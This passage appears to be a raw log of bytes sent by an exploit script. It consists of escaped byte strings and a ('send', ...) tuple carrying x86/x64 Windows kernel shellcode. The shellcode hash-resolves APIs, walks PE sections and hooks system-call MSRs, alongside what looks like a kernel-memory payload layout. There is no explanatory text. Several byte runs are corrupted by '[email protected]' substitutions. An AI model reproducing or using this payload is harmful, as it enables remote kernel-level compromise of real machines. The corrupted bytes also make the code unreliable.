Z_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 5, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 